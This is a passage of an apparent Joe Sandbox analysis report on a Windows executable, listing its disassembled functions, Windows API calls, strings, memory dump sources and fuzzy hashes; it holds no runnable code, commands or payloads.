                                                      • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00405498
                                                      • GlobalFree.KERNEL32(00000000), ref: 004054A8
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405604
                                                      • ShowWindow.USER32(?,00000000), ref: 00405652
                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                      • ShowWindow.USER32(00000000), ref: 00405664
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 2564846305-813528018
                                                      • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                      • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                      • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                      • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004047C0 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 204windowstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040485E
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040488F
                                                      • GetSysColor.USER32(?), ref: 004048A0
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                      • lstrlenW.KERNEL32(?), ref: 004048C1
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                      • SendMessageW.USER32(00000000), ref: 00404943
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                      • SetCursor.USER32(00000000), ref: 004049C2
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                      • SetCursor.USER32(00000000), ref: 004049DE
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A0D
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                      • String ID: 7G@$: Completed$N$m
                                                      • API String ID: 3103080414-2469137636
                                                      • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                      • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                      • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                      • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004062C8 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                      • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                        • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                        • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                      • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                      • wsprintfA.USER32 ref: 00406347
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                      • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                        • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                        • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                      • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                      • API String ID: 2171350718-2529913679
                                                      • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                      • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                      • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                      • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                      • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                      • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                      • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406930 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                      • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                      • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                      Strings
                                                      • "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe", xrefs: 00406974
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                      • *?|<>/":, xrefs: 00406982
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 589700163-2900581319
                                                      • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                      • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                      • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                      • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404668 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                      • GetSysColor.USER32(00000000), ref: 004046C3
                                                      • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                      • SetBkMode.GDI32(?,?), ref: 004046DB
                                                      • GetSysColor.USER32(?), ref: 004046EE
                                                      • SetBkColor.GDI32(?,?), ref: 004046FE
                                                      • DeleteObject.GDI32(?), ref: 00404718
                                                      • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                      • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                      • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                      • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                        • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406269
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                      • String ID: 9
                                                      • API String ID: 163830602-2366072709
                                                      • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                      • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                      • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                      • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403033 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,00000000), ref: 0040304E
                                                      • GetTickCount.KERNEL32 ref: 0040306C
                                                      • wsprintfW.USER32 ref: 0040309A
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                      • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                        • Part of subcall function 00403017: MulDiv.KERNEL32(?,00000064,?), ref: 0040302C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
                                                      • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                      • Opcode Fuzzy Hash: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
                                                      • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404FBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                      • GetMessagePos.USER32 ref: 00404FDF
                                                      • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
